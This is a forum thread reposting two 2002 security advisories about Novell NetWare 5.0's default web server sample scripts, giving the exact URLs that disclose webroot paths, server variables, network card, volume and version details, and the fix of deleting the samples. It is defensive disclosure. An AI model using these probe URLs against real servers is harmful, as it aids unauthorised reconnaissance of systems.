Vulnerability in Novell Netware 5.0
Results 1 to 2 of 2

Thread: Vulnerability in Novell Netware 5.0

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    742

    Vulnerability in Novell Netware 5.0

    Vulnerability in Novell Netware 5.0 (part1)

    Source: bugtraq@securityfocus.com

    Procheckup Ltd http://www.procheckup.com
    Procheckup Security Bulletin PR02-1


    Description: Netware default programs displays server
    variables including web root location
    Date: 8/1/2002

    Application: Netware enterprise web server
    Platform: Novell NetWare 5.0
    Severity: Remote attackers can discover the location of the webroot.
    Authors: Richard Brain [richard.brain@procheckup.com]
    Vendor Status:
    CVE Candidate: Not assigned
    Reference: http://www.procheckup.com/security_info/vuln.html

    Description:
    NetWare 5.1 installed with default settings, installs with
    the Novonyx webserver. This webserver resides on port 80
    and comes with sample files which disclose information


    1) Requesting the following url :-

    http://webserver/lcgi/sewse.nlm?
    sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse

    The following information is returned:-

    Here are the ScriptEase:WSE input values
    _argv[-1] = "SEWSE"
    _argv[0]
    = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"

    Current directory is
    NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
    Here are the cgi.getVar() values
    Here are the Clib.getenv() values
    HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg,
    image/pjpeg, */*
    HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm
    HTTP_ACCEPT_LANGUAGE=en-gb
    HTTP_ACCEPT_ENCODING=gzip, deflate
    HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows
    NT 5.0; EncExt; T312461; Q312461)
    HTTP_HOST=192.168.1.109
    HTTP_CONNECTION=Keep-Alive
    HTTP_COOKIE=N2S19P61=963269677
    ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config
    NETSITE_ROOT=/novonyx/suitespot
    SERVER_NAMES=lcgi
    ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-
    null Authorization: NS-value-is-null UserDN: NS-value-is-
    null
    SERVER_SOFTWARE=Netscape 3.5 for NetWare
    SERVER_PORT=80
    SERVER_NAME=NETWARE.PROCHECKUP.COM
    SERVER_URL=http://192.168.1.109
    REMOTE_HOST=192.168.1.250
    REMOTE_ADDR=192.168.1.250
    HTTPS=OFF
    GATEWAY_INTERFACE=LCGI/1.1
    SERVER_PROTOCOL=HTTP/1.1
    REQUEST_METHOD=GET
    SCRIPT_NAME=/lcgi/sewse.nlm
    QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield
    .jse
    NS_SESSION=-751448704
    NS_REQUEST=-695399320
    FN=lcgi_map_init
    PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
    CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/

    ==========================================================

    2) ALSO

    Requesting the following url :-
    http://192.168.1.109/lcgi/sewse.nlm?
    sys:/novonyx/suitespot/docs/sewse/misc/test.jse

    The following information is returned:-

    SERVER_SOFTWARE=Netscape 3.5 for NetWare
    SERVER_PORT=80
    SERVER_NAME=NETWARE.PROCHECKUP.COM
    SERVER_URL=http://192.168.1.109
    REMOTE_HOST=192.168.1.250
    REMOTE_ADDR=192.168.1.250
    HTTPS=OFF
    GATEWAY_INTERFACE=LCGI/1.1
    SERVER_PROTOCOL=HTTP/1.1
    REQUEST_METHOD=GET
    SCRIPT_NAME=/lcgi/sewse.nlm
    QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse

    NS_SESSION=-798892160
    NS_REQUEST=-800372600
    FN=lcgi_map_init
    PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
    CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
    http://192.168.1.109

    3) ALSO

    Requests the following url :-
    http://webserver/perl/samples/env.pl

    The following information is returned:-

    HSERVER_SOFTWARE Netscape 3.5 for NetWare
    GATEWAY_INTERFACE LCGI/1.1
    NS_SESSION -707141760
    REMOTE_ADDR 192.168.1.250
    SERVER_PROTOCOL HTTP/1.1
    NS_REQUEST -695399320
    PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl
    REQUEST_METHOD GET
    REMOTE_HOST 192.168.1.250
    SERVER_URL http://192.168.1.109
    SERVER_NAMES perl
    HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows
    NT 5.0; EncExt; T312461; Q312461)
    HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg,
    image/pjpeg, */*
    HTTP_CONNECTION Keep-Alive
    HTTP_ACCEPT_LANGUAGE en-gb
    HTTPS OFF
    CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/
    FN lcgi_map_init
    SCRIPT_NAME /perl
    HTTP_ACCEPT_ENCODING gzip, deflate
    ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config
    PERL_ROOT SYS:novonyx/suitespot/docs/perlroot
    SERVER_NAME NETWARE.PROCHECKUP.COM
    PATH_INFO /samples/env.pl
    HTTP_COOKIE N2S19P61=963269677
    SERVER_PORT 80
    ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-
    null Authorization: NS-value-is-null UserDN: NS-value-is-
    null
    HTTP_HOST 192.168.1.109
    PATH_TRANSLATED
    SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
    NETSITE_ROOT /novonyx/suitespot

    Solution:

    Delete all default example programs if not needed.

    Legal:

    Copyright 2002 Procheckup Ltd. All rights reserved.

    Permission is granted for copying and circulating this
    Bulletin to the Internet community for the purpose of
    alerting them to problems, if and only if, the Bulletin is
    not edited or changed in any way, is attributed to
    Procheckup, and provided such reproduction and/or
    distribution is performed for non-commercial purposes.


    Any other use of this information is prohibited.
    Procheckup is not
    liable for any misuse of this information by any third
    party.

    --------------------------------------------------------------------------------

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    742
    Vulnerability in Novell Netware 5.0 (part2)

    Source: bugtraq@securityfocus.com

    Procheckup Ltd
    http://www.procheckup.com
    Procheckup Security Bulletin PR02-3


    Description:
    Netware default programs display server
    information to attackers.
    Date: 8/1/2002

    Application: Netware enterprise web server
    Platform: Novell NetWare 5.0
    Severity: Remote attackers can discover the location of the webroot
    Authors: Richard Brain [richard.brain@procheckup.com]
    Vendor Status:
    CVE Candidate: Not assigned
    Reference: http://www.procheckup.com/security_info/vuln.html

    Description:
    NetWare 5.1 installed with default settings, installs with
    the Novonyx webserver. This webserver resides on port 80
    and comes with sample files which disclose information

    1) Requesting the following url :-

    http://webserver/perl/samples/lancgi.pl

    Gives lan board details.

    Lan Boards

    Description Address Media Type Board Number Board Instance
    Compaq Ethernet or Fast Ethernet NIC 658B50004354
    ETHERNET_802.2 1 1
    Compaq Ethernet or Fast Ethernet NIC 658B50004354
    ETHERNET_II 2 1

    2) Requesting the following url :-

    http://webserver/perl/samples/volscgi.pl

    Gives the volume names with status information

    Volumes

    Description Total Space Free Space Block Size Total Dir
    SYS 6065984 5390848 65536 66048

    3) Requesting the following url :-

    http://webserver/perl/samples/ndslogin.pl

    Seems to allow remote interactive logins.... with NDS tree
    viewing

    Login to NDS and enumerate the contents

    ------------------------------------------------------------

    Fullname: ex: nds:\\novell_tree\novell_context
    Username: *

    Password:

    4) Requesting the following url :-

    http://webserver/netbasic/websinfo.bas

    Gives the server name and exact netware version running

    Company: Novell
    Revision: NetWare 5.00i
    Date: 27 March 2000

    Solution:

    Delete all default example programs if not needed.

    Legal:

    Copyright 2002 Procheckup Ltd. All rights reserved.

    Permission is granted for copying and circulating this
    Bulletin to the Internet community for the purpose of
    alerting them to problems, if and only if, the Bulletin is
    not edited or changed in any way, is attributed to
    Procheckup, and provided such reproduction and/or
    distribution is performed for non-commercial purposes.


    Any other use of this information is prohibited. Procheckup
    is not liable for any misuse of this information by any
    third party.


    --------------------------------------------------------------------------------

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides